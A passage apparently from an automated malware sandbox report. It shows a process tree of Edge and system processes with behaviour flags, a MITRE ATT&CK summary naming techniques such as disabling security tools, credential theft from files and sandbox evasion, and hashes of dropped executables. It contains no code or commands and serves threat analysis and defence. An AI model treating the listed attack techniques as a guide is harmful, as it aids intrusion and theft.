                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                    PID:7376
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:9140
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:4908
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:5660
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:5564
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:3180
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                      PID:4656
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                      PID:8172
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:9528
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:6448
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:10040
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:9420
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:4744
                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                      PID:6200
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:712
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                      PID:10076
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x3bc
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:3200
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                        PID:9592
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:10072
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                          PID:3552
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                          PID:2324
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                          PID:1840
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:9088
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:5528
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:5840
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:2672
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x470
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:3460
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:5736
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8680

                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1518

                                                                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                                                                      7
                                                                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                                                                      7
                                                                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        1c494825e5979add62914cfd05ce1821

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        b9070a59fc9dfcf6fc9bda98bda26b780e364d3d

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        d5a41fff5b0a0b3a0b02d046be48f3e254ecf9bcb9ba265aad29d57188596768

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        750b2ffc1ce7ecb108f2f48aea9581250816360aa94691f758e15af20e518f727dc77ae94b3703752f6657ad9f82ca55e5140518dbcb84c00f29830482762f77

                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        a14f255363e1a963461b8f5b12cf31d6

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        4139fbc1fa2270fd568202164a7c0474aa3deb65

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        d7cb86ae72b8a314b5ee32ac66d8306e0330660038dfb403352f1ad612ec0755

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        536af04a8ac8511fb614e11bb60288fbb75f5cd2af8b27184a368fd3c786693a06004eeb8bffaf0beeaa1b1277d94e61f1892b2359ec9f2654b0343b7e2a43e8

                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uVQTcEECi1BAvOEH1vst8UBp.exe.log
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-483JO.tmp\O8Cs7emUPFAF71iifz0tUD4Y.tmp
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\3v8imR2YudnMKl0lu6pcIC0c.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        fce4cfedf3ccd080c13f6fc33e340100

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        c215b130fcadcd265c76bac023322cfa93b6b35f

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        e1cbebc0c9a675ca172e7de1908991f7b0bd0866c1bea9404ae10bc201de0fe6

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        7386baba3d98715da1fd895b35211c01b174687eb7fa65773e04b31184f8d88dff3476249d1766257f04b05c18528aa5dec87dea6e5f5109d92dd96c6badd868

                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\3v8imR2YudnMKl0lu6pcIC0c.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        fce4cfedf3ccd080c13f6fc33e340100

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        c215b130fcadcd265c76bac023322cfa93b6b35f

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        e1cbebc0c9a675ca172e7de1908991f7b0bd0866c1bea9404ae10bc201de0fe6

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        7386baba3d98715da1fd895b35211c01b174687eb7fa65773e04b31184f8d88dff3476249d1766257f04b05c18528aa5dec87dea6e5f5109d92dd96c6badd868

                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\56sDM8FPHBIcnF90k4ibjGDs.exe
                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                        2187ac1cdb84a5a172d51f50aa67f76a

                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                        98dcaf5606c245d08f8ba6fdef95cd1e921a2624

                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                        cb54b6471597a9417bcc042d0f0d6404518b647bd3757035a01e9de6aa109490

                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                        ec0d1b7fe59d430213547e0651a92ebc38b4a57f7c4a30d60bc25306b407fd04e4427c93acb9c34df2e884b9c696cbf7da9ad44c90af25eb4922c72baa84a80e

